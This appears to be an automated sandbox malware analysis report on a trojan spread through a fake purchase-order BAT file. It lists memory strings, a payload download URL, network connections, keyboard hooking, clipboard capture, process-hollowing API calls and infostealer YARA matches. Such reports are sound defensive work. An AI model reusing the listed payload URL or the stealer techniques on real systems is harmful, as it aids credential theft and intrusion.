Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: x.exe, x.exe, 00000004.00000002.1532108594.000000002215C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1551725897.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1474717040.0000000002969000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.000000000296A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1533707068.00000000224BF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1532108594.00000000220FC000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1460918263.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1609735089.0000000002FA2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.1577974384.0000000000416000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.pmail.com
Source: neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: x.exe, 00000004.00000002.1464571050.0000000000696000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/
Source: x.exe, 00000004.00000002.1522045362.0000000020DAD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: x.exe, 00000004.00000002.1522045362.0000000020DC3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D98000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com/yak/233_WisrysxlfsseV
Source: x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49797 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window created: window name: CLIPBRDWNDCLASS

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
.NET source code contains very large strings
Source: server_BTC.exe.12.dr, opqcmgIPmeabY.cs Long String: Length: 17605
Source: TrojanAIbot.exe.14.dr, opqcmgIPmeabY.cs Long String: Length: 17605
Found large BAT file
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat Static file information: 1393123
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58670 NtUnmapViewOfSection, 4_2_02E58670
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58400 NtReadVirtualMemory, 4_2_02E58400
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E57A2C NtAllocateVirtualMemory, 4_2_02E57A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 4_2_02E5DC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 4_2_02E5DC04
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 4_2_02E58D70
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 4_2_02E5DD70
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E57D78 NtWriteVirtualMemory, 4_2_02E57D78
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E57A2A NtAllocateVirtualMemory, 4_2_02E57A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 4_2_02E5DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E58D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 4_2_02E58D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F38670 NtUnmapViewOfSection, 26_2_02F38670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F38400 NtReadVirtualMemory, 26_2_02F38400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F37A2C NtAllocateVirtualMemory, 26_2_02F37A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F38D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread, 26_2_02F38D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F3DD70 NtOpenFile,NtReadFile,NtClose, 26_2_02F3DD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F37D78 NtWriteVirtualMemory, 26_2_02F37D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F386F7 NtUnmapViewOfSection, 26_2_02F386F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F37AC9 NtAllocateVirtualMemory, 26_2_02F37AC9
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F37A2A NtAllocateVirtualMemory, 26_2_02F37A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F38D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread, 26_2_02F38D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF8670 NtUnmapViewOfSection, 32_2_02EF8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF8400 NtReadVirtualMemory, 32_2_02EF8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF7A2C NtAllocateVirtualMemory, 32_2_02EF7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF7D78 NtWriteVirtualMemory, 32_2_02EF7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 32_2_02EF8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EFDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 32_2_02EFDD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF86F7 NtUnmapViewOfSection, 32_2_02EF86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF7A2A NtAllocateVirtualMemory, 32_2_02EF7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EFDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 32_2_02EFDBB0
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EFDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 32_2_02EFDC8C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EFDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 32_2_02EFDC04
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EF8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 32_2_02EF8D6E
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 4_2_02E5F7C8
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E420C4 4_2_02E420C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_0121AA42 13_2_0121AA42
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_0121EA80 13_2_0121EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_01214A98 13_2_01214A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_0121DF00 13_2_0121DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_01213E80 13_2_01213E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_012141C8 13_2_012141C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_0121DF00 13_2_0121DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A956B8 13_2_06A956B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A966E8 13_2_06A966E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A9C2A0 13_2_06A9C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A9B32A 13_2_06A9B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A93178 13_2_06A93178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A97E78 13_2_06A97E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A97798 13_2_06A97798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A9E4C0 13_2_06A9E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A92350 13_2_06A92350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A90040 13_2_06A90040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A95DDF 13_2_06A95DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 13_2_06A90006 13_2_06A90006
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 14_2_009885B7 14_2_009885B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 14_2_009885C8 14_2_009885C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0499B490 16_2_0499B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0499B470 16_2_0499B470
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065EDAAC 20_2_065EDAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E1B94 20_2_065E1B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065EE608 20_2_065EE608
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E25B8 20_2_065E25B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E25A8 20_2_065E25A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E4174 20_2_065E4174
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E1D20 20_2_065E1D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_065E1B88 20_2_065E1B88
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 20_2_06663360 20_2_06663360
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 26_2_02F220C4 26_2_02F220C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_011641C8 29_2_011641C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_01164A98 29_2_01164A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0116EA80 29_2_0116EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0116DF00 29_2_0116DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_01163E80 29_2_01163E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0116DF00 29_2_0116DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0116A988 29_2_0116A988
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_069256B8 29_2_069256B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_069266E8 29_2_069266E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06927E78 29_2_06927E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0692C2A0 29_2_0692C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0692B32A 29_2_0692B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06923178 29_2_06923178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06927798 29_2_06927798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_0692E4C0 29_2_0692E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06925DDF 29_2_06925DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06922350 29_2_06922350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06920040 29_2_06920040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 29_2_06920006 29_2_06920006
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: 32_2_02EE20C4 32_2_02EE20C4
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E44860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E44500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E444DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E5894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E589D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 02E446D4 appears 244 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02F24860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02F3894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02F246D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02EF894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02EE46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Code function: String function: 02EE4860 appears 683 times
Yara signature match
Source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: armsvc.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winBAT@55/27@3/3
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E47FD4 GetDiskFreeSpaceA, 4_2_02E47FD4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E56DC8 CoCreateInstance, 4_2_02E56DC8
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\PNO Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-74b31e1c42af9477-inf
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-74b31e1c42af9477cd68e75b-b
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\CAB08060.TMP Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
